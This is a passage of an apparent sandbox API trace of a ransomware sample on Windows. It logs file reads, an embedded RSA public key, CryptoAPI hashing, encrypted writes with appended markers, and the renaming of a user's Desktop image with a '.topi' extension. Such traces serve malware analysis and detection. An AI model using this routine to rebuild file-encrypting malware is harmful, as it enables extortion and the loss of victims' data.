lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.319] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.319] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.319] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x8416, lpOverlapped=0x0) returned 1 [0094.319] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.319] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.319] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.319] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.319] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0094.320] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.320] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.320] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.320] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.321] GetLastError () returned 0x0 [0094.321] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.321] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0094.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.321] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.321] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.321] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8420) returned 0x99f52d8 [0094.321] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x3193e68 [0094.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x320fab0 [0094.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0094.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3850 [0094.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8d48 [0094.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d36e8 [0094.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f58 [0094.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f88 [0094.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f40 [0094.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x31ce620 [0094.322] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x31ce620, Size=0x218) returned 0x3165e90 [0094.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f88 | out: hHeap=0x680000) returned 1 [0094.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f40 | out: hHeap=0x680000) returned 1 [0094.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0094.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8f40 [0094.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d8f88 [0094.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0094.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f40 | out: hHeap=0x680000) returned 1 [0094.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f88 | out: hHeap=0x680000) returned 1 [0094.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0094.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0094.323] GetCurrentThreadId () returned 0x8c4 [0094.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1430 [0094.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.324] GetCurrentThreadId () returned 0x8c4 [0094.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f88 [0094.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0094.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f40 [0094.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f70 [0094.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8fb8 [0094.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e80 [0094.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f88 | out: hHeap=0x680000) returned 1 [0094.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f88 [0094.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f88 | out: hHeap=0x680000) returned 1 [0094.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x3165e90 [0094.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fb8 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f40 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f70 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f58 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d36e8 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x320fab0 | out: hHeap=0x680000) returned 1 [0094.328] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.328] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3193e68 | out: hHeap=0x680000) returned 1 [0094.328] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f52d8*, nNumberOfBytesToWrite=0x8411, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f52d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x8411, lpOverlapped=0x0) returned 1 [0094.328] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0094.328] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x8416, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.328] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.328] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.328] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0094.328] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.328] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.328] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.328] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0094.328] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.328] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.328] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.328] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.329] CloseHandle (hObject=0x6a8) returned 1 [0094.329] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.329] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0094.330] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.330] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6sr80q9hh7H4Me.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6sr80q9hh7h4me.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6sr80q9hh7H4Me.png.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6sr80q9hh7h4me.png.topi")) returned 1 [0094.330] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.330] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.330] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.331] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.331] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb82fbaf0, ftCreationTime.dwHighDateTime=0x1d5c3f4, ftLastAccessTime.dwLowDateTime=0x8428c610, ftLastAccessTime.dwHighDateTime=0x1d5bfb8, ftLastWriteTime.dwLowDateTime=0x8428c610, ftLastWriteTime.dwHighDateTime=0x1d5bfb8, nFileSizeHigh=0x0, nFileSizeLow=0x12298, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7doP5kfmX.jpg", cAlternateFileName="7DOP5K~1.JPG")) returned 1 [0094.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.332] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0094.332] HeapFree 